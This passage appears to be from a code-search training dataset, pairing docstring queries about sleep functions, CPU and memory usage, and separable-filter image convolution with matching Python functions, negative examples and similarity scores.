async_sleep_until_interrupt(sleep_time, _interrupt, interval=0.5)", "def pulse(seconds):\n index = 0\n while index < len(fake_threads):\n t = fake_threads[index]\n t['sleep'] -= seconds\n if t['sleep'] <= 0:\n t['sleep'] = 0\n t['next_sleep_time'] = None\n t['greenlet'].run()\n sleep_time = t['next_sleep_time']\n if sleep_time is None or isinstance(sleep_time, tuple):\n del fake_threads[index]\n index -= 1\n else:\n t['sleep'] = sleep_time\n index += 1", "def Sleep(desired_sleep):\n actual_sleep = 0\n while True:\n sleep_length = desired_sleep - actual_sleep\n start_time = int(time.time())\n Log('Sleep: Sleeping for %s seconds' % sleep_length)\n time.sleep(sleep_length)\n this_sleep = int(time.time()) - start_time\n Log('Sleep: Actually slept for %s seconds' % actual_sleep)\n if this_sleep < 0:\n Log('Sleep: Error, this_sleep was %d (less than zero)' % actual_sleep)\n break\n actual_sleep += this_sleep\n if actual_sleep >= desired_sleep:\n Log('Sleep: Finished sleeping, returning' % actual_sleep)\n break\n Log('Sleep: Awoke too early, sleeping again')", "def sleep(self, amount: float):\n time.sleep(amount)", "def thread_sleep(seconds, event):\n for i in range(seconds):\n if event and event.is_set():\n return 1\n sleep(1)\n return 0", "def sleep(interval):\n time.sleep(interval) # pragma: no cover", "def wait_for_seconds(self, seconds, sleeptime=0.001):\n self.listen_until_return(timeout=seconds, sleeptime=sleeptime)", "def delay(seconds):\n\n # Perform the delay\n time.sleep(seconds)", "def wake_till(seconds):\n while True:\n if int(time.time()) < seconds:\n time.sleep(5)\n else:\n return", "def _sleep(self):\n while 1:\n diff = (time.time()-self.lastcall) - self.mindelay\n if diff >= 0: return\n time.sleep(max(-diff/2.0, 0.01))", "def sleep_after(self, seconds):\n if self._firmware >= 264:\n self.write(self.ASCII_ESC, '8', seconds, seconds >> 8)\n else:\n self.write(self.ASCII_ESC, '8', seconds)", "def sleep_approx(self, seconds):\n upperbound = (seconds+0.2)*10000\n if (seconds >= 1):\n lowerbound = (seconds-0.2)*10000\n else:\n lowerbound = seconds*10000\n\n sleeptime = random.randint(lowerbound, upperbound)\n sleeptime = sleeptime/10000\n sleeptime = sleeptime*.8\n\n if (self.botspeed == 1.25):\n sleeptime = sleeptime*.75\n elif (self.botspeed == 1.5):\n sleeptime = sleeptime*.5\n sleep(sleeptime)", "def sleep(self):\n if self._stop is not None:\n timeLeft = max(self._stop - time.time(), 0) \n sleep = min(self._sleep, timeLeft)\n else:\n sleep = self._sleep\n time.sleep(sleep)", "def sleep(self):\n self.sleep_after(1) # Can't be 0, that means 'don't sleep'" ]
[ "0.70630014", "0.7060907", "0.7036341", "0.69794136", "0.6970344", "0.696298", "0.6951769", "0.6951769", "0.69417673", "0.67783153", "0.67622095", "0.66984147", "0.66940546", "0.662884", "0.6621498", "0.6614137", "0.64386445", "0.6405465", "0.6392214", "0.63817585", "0.62740105", "0.6261619", "0.6246918", "0.6240803", "0.620743", "0.6200762", "0.61901", "0.61846226", "0.613975", "0.6138885" ]
0.7286979
0
Returns CPU and memory usage information. It returns the results in a tuple, with the first element being the number of CPU seconds spent in user land, the second is the number of CPU seconds spent in system land, and the third is the current resident size of the process in bytes.
def get_usage_info(self): usage_info = resource.getrusage(resource.RUSAGE_SELF) user_cpu = usage_info[0] system_cpu = usage_info[1] rss_size = usage_info[2] return user_cpu, system_cpu, rss_size
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_total_cpu_time_and_memory_usage() -> Tuple[float, int]:\n me = resource.getrusage(resource.RUSAGE_SELF)\n children = resource.getrusage(resource.RUSAGE_CHILDREN)\n total_cpu_time = me.ru_utime + me.ru_stime + children.ru_utime + children.ru_stime\n total_memory_usage = me.ru_maxrss + children.ru_maxrss\n return total_cpu_time, total_memory_usage", "def _cpu_and_men_usage(processes):\n cpu_usage = 0\n mem_usage_mb = 0\n\n for process in processes:\n cpu_usage += process.cpu_percent()\n mem_usage_mb += process.memory_info().rss >> 20 # from bytes to Mb\n\n return cpu_usage, mem_usage_mb", "def getcpuusage(self):\n return ord(self.reg(0x11, write=1))", "def GetCpuStats(self, pid):\n class ProcTaskInfo(ctypes.Structure):\n \"\"\"Struct for proc_pidinfo() call.\"\"\"\n _fields_ = [(\"pti_virtual_size\", ctypes.c_uint64),\n (\"pti_resident_size\", ctypes.c_uint64),\n (\"pti_total_user\", ctypes.c_uint64),\n (\"pti_total_system\", ctypes.c_uint64),\n (\"pti_threads_user\", ctypes.c_uint64),\n (\"pti_threads_system\", ctypes.c_uint64),\n (\"pti_policy\", ctypes.c_int32),\n (\"pti_faults\", ctypes.c_int32),\n (\"pti_pageins\", ctypes.c_int32),\n (\"pti_cow_faults\", ctypes.c_int32),\n (\"pti_messages_sent\", ctypes.c_int32),\n (\"pti_messages_received\", ctypes.c_int32),\n (\"pti_syscalls_mach\", ctypes.c_int32),\n (\"pti_syscalls_unix\", ctypes.c_int32),\n (\"pti_csw\", ctypes.c_int32),\n (\"pti_threadnum\", ctypes.c_int32),\n (\"pti_numrunning\", ctypes.c_int32),\n (\"pti_priority\", ctypes.c_int32)]\n PROC_PIDTASKINFO = 4\n def __init__(self):\n self.size = ctypes.sizeof(self)\n super(ProcTaskInfo, self).__init__() # pylint: disable=bad-super-call\n\n proc_info = ProcTaskInfo()\n if not self.libproc:\n self.libproc = ctypes.CDLL(ctypes.util.find_library('libproc'))\n self.libproc.proc_pidinfo(pid, proc_info.PROC_PIDTASKINFO, 0,\n ctypes.byref(proc_info), proc_info.size)\n\n # Convert nanoseconds to seconds.\n cpu_time = (proc_info.pti_total_user / 1000000000.0 +\n proc_info.pti_total_system / 1000000000.0)\n results = {'CpuProcessTime': cpu_time,\n 'ContextSwitches': proc_info.pti_csw}\n\n # top only reports idle wakeup count starting from OS X 10.9.\n if self.GetOSVersionName() >= os_version_module.MAVERICKS:\n results.update({'IdleWakeupCount': self._GetIdleWakeupCount(pid)})\n return results", "def memory():\n\n mem_info = {}\n\n if platform.linux_distribution()[0]:\n with open('/proc/meminfo') as file:\n c = 0\n for line in file:\n lst = line.split()\n if str(lst[0]) == 'MemTotal:':\n mem_info['total'] = int(lst[1])\n elif str(lst[0]) in ('MemFree:', 'Buffers:', 'Cached:'):\n c += int(lst[1])\n mem_info['free'] = c\n mem_info['used'] = (mem_info['total']) - c\n elif platform.mac_ver()[0]:\n ps = subprocess.Popen(['ps', '-caxm', '-orss,comm'], stdout=subprocess.PIPE).communicate()[0]\n vm = subprocess.Popen(['vm_stat'], stdout=subprocess.PIPE).communicate()[0]\n\n # Iterate processes\n process_lines = ps.split('\\n')\n sep = re.compile('[\\s]+')\n rss_total = 0 # kB\n for row in range(1, len(process_lines)):\n row_text = process_lines[row].strip()\n row_elements = sep.split(row_text)\n try:\n rss = float(row_elements[0]) * 1024\n except:\n rss = 0 # ignore...\n rss_total += rss\n\n # Process vm_stat\n vm_lines = vm.split('\\n')\n sep = re.compile(':[\\s]+')\n vm_stats = {}\n for row in range(1, len(vm_lines) - 2):\n row_text = vm_lines[row].strip()\n row_elements = sep.split(row_text)\n vm_stats[(row_elements[0])] = int(row_elements[1].strip('\\.')) * 4096\n\n mem_info['total'] = rss_total\n mem_info['used'] = vm_stats[\"Pages active\"]\n mem_info['free'] = vm_stats[\"Pages free\"]\n else:\n raise('Unsupported Operating System.\\n')\n exit(1)\n\n return mem_info", "def get_cpu_usage():\n process_details = RU_OBJ.get_curr_processes()\n return json.dumps(sorted(process_details, key=lambda k: k['name']))", "async def sysinfo(self, ctx: Context):\n\t\tstart = time.perf_counter()\n\t\tend = time.perf_counter()\n\t\tduration = (end - start) * 1000\n\t\tcpuavg = psutil.cpu_percent(interval=None)\n\t\tmem = psutil.virtual_memory()[2]\n\t\tdurround = round(duration, 3)\n\t\tosun = os.uname()\n\t\tawait self.send(f\"System Info | CPU: {cpuavg}% | RAM: {mem}% | Latency: {durround * 1000}ms | OS: {sys.platform}\", whisper=[ctx.author.id])", "def read_cpu_usage():\n cpuInfo = OrderedDict()\n\n with open('/proc/stat') as f:\n for line in f:\n l = line.split()\n if len(l) < 5:\n continue\n if l[0].startswith('cpu'):\n cpuInfo[l[0]] = l\n\n return cpuInfo", "def cpu_usage(self):\n dsp = c_float()\n stream = c_float()\n geometry = c_float()\n update = c_float()\n total = c_float()\n ckresult(\n _dll.FMOD_System_GetCPUUsage(\n self._ptr,\n byref(dsp),\n byref(stream),\n byref(geometry),\n byref(update),\n byref(total),\n )\n )\n return so(\n dsp=dsp.value,\n stream=stream.value,\n geometry=geometry.value,\n update=update.value,\n total=total.value,\n )", "def memory_usage():\n\n # Handle optional psutil support\n try:\n import psutil\n\n psutil_version = version_tuple(psutil.__version__)\n if psutil_version < (0, 6, 0):\n usage = psutil.phymem_usage()\n used = usage.used\n else:\n usage = psutil.virtual_memory()\n used = usage.total - usage.available\n\n return used, usage.total\n\n except ImportError:\n pass\n\n return None, None", "def CPUStats(cls):\n\t\t# From <http://ubuntuforums.org/showthread.php?t=148781>\n\t\ttime_list = cat(\"/proc/stat\").split(\"\\n\")[0].split(\" \")[2:6]\n\t\tres = map(int, time_list)\n\t\tcls.LAST_CPU_STAT = res\n\t\treturn res", "def get_memory_usage():\n\n memory_usage = {'total' : 0, 'used' : 0}\n meminfo = subprocess.Popen(['free', '-m'], shell=False, stdout=subprocess.PIPE)\n meminfo.stdout.readline()\n total_used = meminfo.stdout.readline()\n memory_usage['total'] = total_used.split()[1]\n memory_usage['used'] = total_used.split()[2]\n return memory_usage", "def get_mem_usage():\n return process.memory_info().rss / 1024.**2", "def get_mem_usage():\n \n with open('/proc/meminfo') as f:\n for line in f:\n if line.startswith('MemTotal:'):\n mem_total = int(line.split()[1])\n elif line.startswith('MemFree:'):\n mem_free = int(line.split()[1])\n elif line.startswith('VmallocTotal:'):\n vm_total = int(line.split()[1])\n elif line.startswith('Cached:'):\n mem_cached = int(line.split()[1])\n \n return {\n 'total': mem_total,\n 'res': mem_total - mem_free,\n 'virt': vm_total,\n 'cached': mem_cached\n }", "def get_cpu_usage(self):\n\t\treturn call_sdk_function('PrlStatCpu_GetCpuUsage', self.handle)", "def get_cpu_usage():\n cpuInfo1 = read_cpu_usage()\n if not cpuInfo1:\n return None\n\n time.sleep(2)\n\n cpuInfo2 = read_cpu_usage()\n if not cpuInfo2:\n return None\n\n cpuUsage = OrderedDict()\n\n for key in cpuInfo1.keys():\n cpustr1 = cpuInfo1[key]\n cpustr2 = cpuInfo2[key]\n\n if len(cpustr1) >= 7 and len(cpustr2) >= 7:\n\n totalCPUTime1 = long(cpustr1[1]) + long(cpustr1[2]) + long(cpustr1[3]) + long(cpustr1[4]) + long(cpustr1[5]) + long(cpustr1[6]) + long(\n cpustr1[7])\n usedCPUTime1 = long(cpustr1[1]) + long(cpustr1[2]) + long(cpustr1[3])\n\n totalCPUTime2 = float(cpustr2[1]) + long(cpustr2[2]) + long(cpustr2[3]) + long(cpustr2[4]) + long(cpustr2[5]) + long(cpustr2[6]) + long(\n cpustr2[7])\n usedCPUTime2 = float(cpustr2[1]) + long(cpustr2[2]) + long(cpustr2[3])\n\n cpuPct = round((usedCPUTime2 - usedCPUTime1) * 100 / (totalCPUTime2 - totalCPUTime1), 2)\n cpuUsage[key] = cpuPct\n\n return cpuUsage", "def get_cpu_usage(cls):\n\n cpu_stats = psutil.cpu_times_percent(percpu=False)\n cpu_stats_dict = { StatsKeys.CPU :\n {\n StatsKeys.IDLE : cpu_stats.idle,\n StatsKeys.SYSTEM : cpu_stats.system,\n StatsKeys.USER : cpu_stats.user,\n StatsKeys.COUNT : len(psutil.cpu_times(percpu=True))\n }\n }\n logger.debug(\"CPU stats: {}\".format(cpu_stats_dict))\n\n return cpu_stats_dict", "def cpuinfo(self):\n \n command = 'cat /proc/cpuinfo'\n\tpipe = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = pipe.communicate()\n\tinfo = stdout.strip()\n cpu_type = None\n\tn_proc = 0\n\tfor line in info.split('\\n'):\n if 'model name' in line:\n\t n_proc += 1\n if cpu_type is None:\n\t\t cpu_type = ' '.join(line.split(':')[-1].strip().split())\n\t\n\treturn (cpu_type, n_proc)", "def get_cpu_usage():\n return psutil.cpu_percent()", "def cpu_times():\n \n with open(Path.proc_stat()) as f:\n line = f.readline()\n \n cpu_times = [int(x) for x in line.split()[1:]]\n \n return cpu_times", "def get_current_mem_usage():\n process = psutil.Process()\n return process.memory_info().rss / float(2**20)", "def memavail() -> tuple:\n with open('/proc/meminfo') as m:\n info = [ _.split() for _ in m.read().split('\\n') ]\n\n return float(info[2][1])/float(info[0][1]) , int(info[0][1]) << 10", "def cpu_usage():\n return str(_cpu_usage())", "def get_cpu_usage(conn):\n prev_idle = 0\n prev_total = 0\n cpu = conn.getCPUStats(-1, 0)\n if type(cpu) == dict:\n for num in range(2):\n idle = list(conn.getCPUStats(-1, 0).values())[1]\n total = sum(list(conn.getCPUStats(-1, 0).values()))\n diff_idle = idle - prev_idle\n diff_total = total - prev_total\n diff_usage = (1000 * (diff_total - diff_idle) / diff_total + 5) / 10\n prev_total = total\n prev_idle = idle\n if num == 0:\n time.sleep(1)\n else:\n if diff_usage < 0:\n diff_usage = 0\n else:\n return {'usage': None}\n return {'usage': diff_usage}", "def _get_sys_per_cpu_times():\r\n cpus = []\r\n f = open('/proc/stat', 'r')\r\n # get rid of the first line who refers to system wide CPU stats\r\n try:\r\n f.readline()\r\n for line in f.readlines():\r\n if line.startswith('cpu'):\r\n values = line.split()[1:8]\r\n values = tuple([float(x) / _CLOCK_TICKS for x in values])\r\n entry = nt_sys_cputimes(*values[:7])\r\n cpus.append(entry)\r\n return cpus\r\n finally:\r\n f.close()", "def get_cpu_usage(*args):\n \n keys = ['us', 'ni', 'sy', 'id', 'wa', 'hi', 'si', 'st'] #usage % to be returned\n \n with open('/proc/stat') as f1:\n with open('/proc/stat') as f2:\n content1 = f1.read() #first collection\n yield {} #yield so that caller can put delay before sampling again\n content2 = f2.read() #second collection\n \n cpu_count = multiprocessing.cpu_count() #total number of cpu cores available\n lines1, lines2 = content1.splitlines(), content2.splitlines()\n data, deltas = {}, {}\n \n #if only one cpu available, read only the first line, else read total cpu count lines starting from the second line\n i, cpu_count = (1, cpu_count + 1) if cpu_count > 1 else (0, 1)\n \n #extract deltas\n while i < cpu_count:\n line_split1 = lines1[i].split()\n line_split2 = lines2[i].split()\n deltas[line_split1[0]] = [int(b) - int(a) for a, b in zip(line_split1[1:], line_split2[1:])]\n i += 1\n \n for key in deltas:\n #calculate the percentage\n total = sum(deltas[key])\n data[key] = dict(zip(keys, [100 - (100 * (float(total - x) / total)) for x in deltas[key]]))\n \n yield data", "def _get_mem_info(self):\n memory_usage_pct = None\n try:\n memory_usage = self._get_cgroups_current_memory_usage()\n if self._max_memory_usage and memory_usage:\n memory_usage_pct = round((memory_usage / self._max_memory_usage) * 100, 1)\n except BaseException:\n self._log.warning(f'Unable to determine memory usage', exc_info=True)\n return memory_usage_pct", "def cpu_info():\n \n with open(Path.proc_cpuinfo()) as f:\n cpuinfo = {'processor_count': 0}\n for line in f:\n if ':' in line:\n fields = line.replace('\\t', '').strip().split(': ')\n # count processores and filter out core specific items\n if fields[0] == 'processor':\n cpuinfo['processor_count'] += 1\n elif fields[0] != 'core id':\n try:\n cpuinfo[fields[0]] = fields[1]\n except IndexError:\n pass\n return cpuinfo", "def do_stats(self, args):\n total_cpu = free_cpu = in_use_cpu = 0\n\n summary = self._qm.get_all_host_summary()\n for host_id, host_info in summary.viewitems():\n host_cpu = int(host_info['total cores'])\n total_cpu += host_cpu\n locked = host_info.get('locked by')\n if locked:\n # If host is locked then all CPUs are in use.\n in_use_cpu += host_cpu\n else:\n free_host_cpu = int(host_info['free cores'])\n in_use_cpu += (host_cpu - free_host_cpu)\n free_cpu += free_host_cpu\n\n print('total CPU: ', total_cpu)\n print('used/locked CPU: ', in_use_cpu)\n print('free CPU: ', free_cpu)\n capacity = float(in_use_cpu) / float(total_cpu)\n print('capacity used: %.1f%%' % (capacity * 100,))\n capacity = float(free_cpu) / float(total_cpu)\n print('capacity remaining: %.1f%%' % (capacity * 100,))", "def cpu_usage(self):\n usages = []\n for w, info in self.worker_info.items():\n usages.append(info['metrics']['cpu'])\n if len(usages)>0:\n return sum(usages) / len(usages)\n else:\n return 0" ]
[ "0.8176625", "0.7808941", "0.7579237", "0.7543515", "0.7478074", "0.7445209", "0.73848224", "0.73599404", "0.7351578", "0.73352563", "0.73092437", "0.73081726", "0.72933537", "0.72700363", "0.7250576", "0.72455794", "0.7233994", "0.7216275", "0.7215389", "0.71842796", "0.71518236", "0.7146915", "0.7068975", "0.70229685", "0.7021479", "0.7020686", "0.7017738", "0.6983417", "0.69466054", "0.69461554" ]
0.78645474
1
Convolve one image with separabl filters.
def convolve_one_image(self,input4D, one_image, image_shape, Pstruct, filter_shape, image_index, channel_index): ## We look at the composition for the first channel in the beginning rank = Pstruct[0]['U1'].shape[1] fwidth = filter_shape[2] fheight = filter_shape[3] # Construct horizontal filters #TODO save the filters in the correct shape horizontal_filter_shape = (rank, 1, fwidth) horizontal_filters = np.ndarray(horizontal_filter_shape) horizontal_filters[:, 0, :] = np.transpose(Pstruct[channel_index]['U1']); # Output is 1 x rank x W x H horizontal_conv_out = conv.conv2d(input=one_image, filters = horizontal_filters, filter_shape = horizontal_filter_shape, image_shape = image_shape) # Construct vertical filters vertical_filter_shape = (rank, fheight, 1) vertical_filters = np.ndarray(vertical_filter_shape) vertical_filters[:,:, 0] = np.transpose(Pstruct[channel_index]['U2']); initial_n_rows = image_shape[1] final_n_rows = initial_n_rows- fwidth + 1 final_n_cols = image_shape[2] - fheight + 1 conv_out = theano.shared(np.zeros((rank, final_n_rows, final_n_cols))) for r in range(rank): # temp is 1x1x imageW x imageH A = conv.conv2d(input = horizontal_conv_out[:,r,:,:], filters = vertical_filters[r,:,:], filter_shape = (1, fheight, 1), image_shape = (1, initial_n_rows, final_n_cols)) conv_out = T.set_subtensor(conv_out[r,:,:], A[0,:,:]) nbr_filters = Pstruct[0]['U3'].shape[0] # Final number of rows and columns ## numberof images, number of filters, image width, image height alphas = Pstruct[channel_index]['U3'] for f in range(nbr_filters): temp = theano.shared(np.zeros((final_n_rows, final_n_cols))) for r in range(rank): temp = temp + conv_out[r, :,:]* alphas[f, r] * Pstruct[channel_index]['lmbda'][r]; input4D =T.set_subtensor(input4D[image_index,f,:,:], temp) return input4D
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def convolve(self, *args, **kwargs):\n return _image.image_convolve(self, *args, **kwargs)", "def MyConvolve(img, ff):\n result = np.zeros(img.shape)\n x_len = img.shape[0]\n y_len = img.shape[1]\n\n ff = np.flipud(np.fliplr(ff)) # Flip filters\n\n # Apply filter to pixels\n for x in range(1, x_len - 1):\n for y in range(1, y_len - 1):\n # Left column\n top_left = img[x - 1, y - 1] * ff[0, 0]\n left = img[x, y - 1] * ff[1, 0]\n btm_left = img[x + 1, y - 1] * ff[2, 0]\n # Middle column\n top = img[x - 1, y] * ff[0, 1]\n middle = img[x, y] * ff[1, 1]\n btm = img[x + 1, y] * ff[2, 1]\n # Right column\n top_right = img[x - 1, y + 1] * ff[0, 2]\n right = img[x, y + 1] * ff[1, 2]\n btm_right = img[x + 1, y + 1] * ff[2, 2]\n\n result[x, y] = top_left + left + btm_left + top + middle + btm + top_right + right + btm_right\n\n return result", "def apply_filter(image: np.ndarray) -> np.ndarray:\n # choose filters to apply\n return clahe(image)", "def convolve(img, fltr, same=False, stri=1, pad=0, repfilter=False):\n # focus = np.array{eltype(img),2} # scope outside of if block\n if np.ndim(img) == 3:\n imgd, imgx, imgy = np.shape(img)\n elif np.ndim(img) == 2:\n imgx, imgy = np.shape(img)\n imgd = 1\n else:\n print(\"Wrong dimensions of image file. Quitting.\")\n return\n\n if np.ndim(fltr) == 3:\n fd, fx, fy = np.shape(fltr)\n elif np.ndim(fltr) == 2:\n fx, fy = np.shape(fltr)\n fd = 1\n else:\n print(\"Wrong dimensions of filter. Quitting.\")\n return\n\n if fd != imgd: # as a convenience we could just replicate the 2d filter...\n print(\"Depths of image and filter not equal. Quitting.\")\n return\n\n if same:\n pad = math.ceil((fx - 1) / 2)\n\n if pad > 0:\n img = dopad(img, pad)\n\n # dimensions of the result of convolution\n x_out = (imgx + 2 * pad - fx) // stri + 1\n y_out = (imgy + 2 * pad - fy) // stri + 1\n\n # print(imgx, imgy)\n\n ret = np.zeros((x_out, y_out))\n if imgd > 1: # slice through the depth, the zeroth (first) dimension\n for i in zip(range(x_out), range(0, imgx, stri)):\n for j in zip(range(y_out), range(0, imgy, stri)):\n ret[i[0], j[0]] = np.sum(img[:, i[1]:i[1] + fx, j[1]:j[1] +\n fy] * fltr)\n else:\n for i in zip(range(x_out), range(0, imgx, stri)):\n for j in zip(range(y_out), range(0, imgy, stri)):\n ret[i[0], j[0]] = np.sum(img[i[1]:i[1] + fx, j[1]:j[1] +\n fy] * fltr)\n return ret", "def _apply_image_filters(self, image, filters=[]):\n derivative = image\n for filter in filters:\n derivative = filter(derivative)\n return derivative", "def deconvolve(self, img, psf):\n self.data = pysap.Image(data=self.deconv.deconvolve(img, psf))", "def convolve(image, pixel_filter, channels=3, name=None):\n with tf.name_scope(name, 'convolve'):\n tf.compat.v1.assert_type(image, tf.float32)\n channel_filter = tf.eye(channels)\n filter_ = (tf.expand_dims(tf.expand_dims(pixel_filter, -1), -1) *\n tf.expand_dims(tf.expand_dims(channel_filter, 0), 0))\n result_batch = tf.nn.conv2d(tf.stack([image]), # batch\n filter=filter_,\n strides=[1, 1, 1, 1],\n padding='SAME')\n return result_batch[0] # unbatch", "def image_conv(image, kernel):\n \n # Filter2D used for performance\n return cv2.filter2D(image, -1, kernel)", "def img_conv(X, filter):\n assert filter.shape[0] % 2 == 1\n assert filter.shape[1] % 2 == 1\n x_size = filter.shape[0] // 2\n y_size = filter.shape[1] // 2\n w = X.shape[0]\n h = X.shape[1]\n out = numpy.zeros(X.shape)\n for r in range(w):\n for c in range(h):\n for x in range(filter.shape[0]):\n pixel_x = r + x - x_size\n if pixel_x < 0:\n pixel_x = -pixel_x\n if pixel_x >= w:\n pixel_x = w - pixel_x - 2\n for y in range(filter.shape[1]):\n pixel_y = c + y - y_size\n if pixel_y < 0:\n pixel_y = -pixel_y\n if pixel_y >= h:\n pixel_y = h - pixel_y - 2\n #if pixel_x >= 0 and pixel_x < w and pixel_y >= 0 and pixel_y < h:\n out[r, c] += filter[x, y] * X[pixel_x, pixel_y]\n return out", "def apply_filter(self, image):\n pass", "def __init__(self, filter1x1, ker_size, filters):\n super(reduce, self).__init__()\n self.con1 = layers.Conv2D(\n filter1x1, kernel_size=1, padding=\"same\", activation=\"relu\"\n )\n self.conv = layers.Conv2D(\n filters, kernel_size=ker_size, padding=\"same\", activation=\"relu\"\n )", "def convolve(self, psf):\n if self.image is None or psf.image is None:\n raise ValueError('Both images to convolve have to be initialized!')\n self.image = fftconvolve(self.image, psf.image, mode='full')\n self.image = rescale_intensity(self.image, out_range=(0, 255))\n self.metadata['Convolved'] = True\n return self.image", "def convolveAndDownsample(img):\n # Select every other pixel from G\n G = sp.signal.convolve2d(img, guassianFilter, 'same')\n return G[::2, ::2]", "def convolve_grayscale_same(images, kernel):\n imgshape = images.shape\n h = images.shape[1]\n w = images.shape[2]\n kh = kernel.shape[0]\n kw = kernel.shape[1]\n # conved = np.zeros((imgshape[0], h - kh + 1, w - kw + 1))\n conved = np.zeros(imgshape)\n ph = int((kh) / 2)\n pw = int((kw) / 2)\n # print(conved.shape)\n # print(kernel.shape, images.shape)\n # print(kernel[None, :, :].shape)\n padimg = np.pad(images, ((0, 0), (ph, ph), (pw, pw)), 'constant',\n constant_values=0)\n for i in range(0, h):\n for j in range(0, w):\n subs = padimg[:, i:i + kh, j:j + kw]\n # ip = i + ph\n # jp = j + pw\n conved[:, i, j] = np.sum((kernel[None, :, :] * subs),\n axis=(1, 2))\n\n return conved", "def custom_filter(image: Image) -> Image:\n image = image.filter(ImageFilter.Kernel(\n size=(3, 3), kernel=(1, 0, 1, 0, 0, 0, 1, 0, 1)))\n return image", "def convolve_grayscale_same(images, kernel):\n m = images.shape[0]\n h = images.shape[1]\n w = images.shape[2]\n kh = kernel.shape[0]\n kw = kernel.shape[1]\n padh = int(kh / 2)\n padw = int(kw / 2)\n pad = ((0, 0), (padh, padh), (padw, padw))\n conv = np.zeros([m, h, w])\n imagePad = np.pad(images, pad_width=pad, mode='constant')\n for i in range(h):\n for j in range(w):\n image = imagePad[:, i:i+kh, j:j+kw]\n conv[:, i, j] = np.multiply(image, kernel).sum(axis=(1, 2))\n return conv", "def forward(self, image):\n height, width = image.shape\n H_out, W_out = output_shape(height, width, self.filter_size, self.padding, self.stride)\n output = np.zeros((H_out, W_out, self.num_filters))\n padded_image = pad_2d(image, self.padding)\n for patch, i, j in self.image_patch(padded_image):\n output[i,j] = np.sum(patch*self.conv_filter, axis=(1,2))\n return output", "def convolve_grayscale_same(images, kernel):\n\n # num images\n n_images = images.shape[0]\n\n # input_width and input_height\n i_h = images.shape[1]\n i_w = images.shape[2]\n\n # kernel_width and kernel_height\n\n k_h = kernel.shape[0]\n k_w = kernel.shape[1]\n\n # pad_h ⊛ = int (k_h - 1)/2\n # pad_w ⊛ = int (k_w - 1)/2\n p_h = int((k_h - 1) / 2)\n p_w = int((k_w - 1) / 2)\n\n if k_h % 2 == 0:\n p_h = int(k_h / 2)\n\n if k_w % 2 == 0:\n p_w = int(k_w / 2)\n\n # output_height and output_width\n # H = i_h + 2pad - k_h + 1, W = i_w + 2pad - k_w + 1\n o_h = i_h + 2 * p_h - k_h + 1\n o_w = i_w + 2 * p_w - k_w + 1\n\n if k_h % 2 == 0:\n o_h = i_h + 2 * p_h - k_h\n\n if k_w % 2 == 0:\n o_w = i_w + 2 * p_w - k_w\n\n # creating outputs of size: n_images, o_h x o_w\n outputs = np.zeros((n_images, o_h, o_w))\n\n # creating pad of zeros around the output images\n padded_imgs = np.pad(images,\n pad_width=((0, 0), (p_h, p_h), (p_w, p_w)),\n mode=\"constant\",\n constant_values=0)\n\n # vectorizing the n_images into an array\n imgs_arr = np.arange(0, n_images)\n\n # iterating over the output array and generating the convolution\n for x in range(o_h):\n for y in range(o_w):\n x1 = x + k_h\n y1 = y + k_w\n outputs[imgs_arr, x, y] = np.sum(np.multiply(\n padded_imgs[imgs_arr, x: x1, y: y1], kernel), axis=(1, 2))\n\n return outputs", "def filtering(image):\n output = np.array(image)\n for x in xrange(0,1):\n bilateralFilter_img = cv2.bilateralFilter(output,5, 75, 75)\n\n return bilateralFilter_img", "def convolve_im(im: np.array,\n kernel: np.array,\n verbose=True):\n\t\n ### START YOUR CODE HERE ### (You can change anything inside this block) \n\t\n H,W = np.shape(im)\n h,w = np.shape(kernel)\n t_b = (H-h)//2\n l_r = (W-w)//2\n kernel_padded = np.pad(kernel, ((t_b, t_b+1),(l_r, l_r+1)), 'constant')\n kernel_padded = np.pad(kernel, ((0, 2*t_b),(0, 2*l_r)), 'constant')\n fft_kernel = np.fft.fft2(kernel_padded, s=None, axes=(-2, -1), norm=None)\n \n \n im_fft = np.fft.fft2(im, s=None, axes=(-2, -1), norm=None) \n im_filt = im_fft*fft_kernel \n conv_result = np.fft.ifft2(im_filt, s=None, axes=(-2, -1), norm=None).real \n\n if verbose:\n # Use plt.subplot to place two or more images beside eachother\n plt.figure(figsize=(12, 4))\n # plt.subplot(num_rows, num_cols, position (1-indexed))\n plt.subplot(1, 2, 1)\n plt.imshow(im, cmap=\"gray\")\n plt.subplot(1, 2, 2) \n plt.imshow(conv_result, cmap=\"gray\")\n\n ### END YOUR CODE HERE ###\n return conv_result", "def convolve_grayscale_valid(images, kernel):\n imgshape = images.shape\n h = images.shape[1]\n w = images.shape[2]\n kh = kernel.shape[0]\n kw = kernel.shape[1]\n conved = np.zeros((imgshape[0], h - kh + 1, w - kw + 1))\n\n for i in range(0, h - kh + 1):\n for j in range(0, w - kw + 1):\n subs = images[:, i:i + kh, j:j + kw]\n conved[:, i, j] = np.sum((kernel[None, :, :] * subs),\n axis=(1, 2))\n\n return conved", "def convolve_channels(images, kernel, padding='same', stride=(1, 1)):\n m = images.shape[0]\n image_h = images.shape[1]\n image_w = images.shape[2]\n filter_h = kernel.shape[0]\n filter_w = kernel.shape[1]\n s1 = stride[0]\n s2 = stride[1]\n\n if padding == 'valid':\n pad_h = 0\n pad_w = 0\n\n if padding == 'same':\n pad_h = int(((image_h - 1) * s1 + filter_h - image_h) / 2) + 1\n pad_w = int(((image_w - 1) * s2 + filter_w - image_w) / 2) + 1\n\n if type(padding) == tuple:\n pad_h = padding[0]\n pad_w = padding[1]\n\n n_dim1 = int((image_h + 2 * pad_h - filter_h) / stride[0]) + 1\n n_dim2 = int((image_w + 2 * pad_w - filter_w) / stride[1]) + 1\n convolve = np.zeros((m, n_dim1, n_dim2))\n new_images = np.pad(images, ((0, 0), (pad_h, pad_h), (pad_w, pad_w),\n (0, 0)), mode='constant')\n for x in range(n_dim1):\n for y in range(n_dim2):\n mini_matrix = new_images[:, x * s1: x * s1 + filter_h,\n y * s2: y * s2 + filter_w, :]\n values = np.sum(mini_matrix * kernel,\n axis=1).sum(axis=1).sum(axis=1)\n convolve[:, x, y] = values\n return (convolve)", "def _valid_convolve(images: th.Tensor, kernels: th.Tensor) -> th.Tensor:\n ret = F.conv2d(images.view((images.shape[0], *images.shape[-3:])).transpose(1, 0),\n th.flip(kernels.view((kernels.shape[0], *kernels.shape[-3:])), dims=(-1, -2)),\n groups=kernels.shape[0]).transpose(1, 0)\n return ret", "def 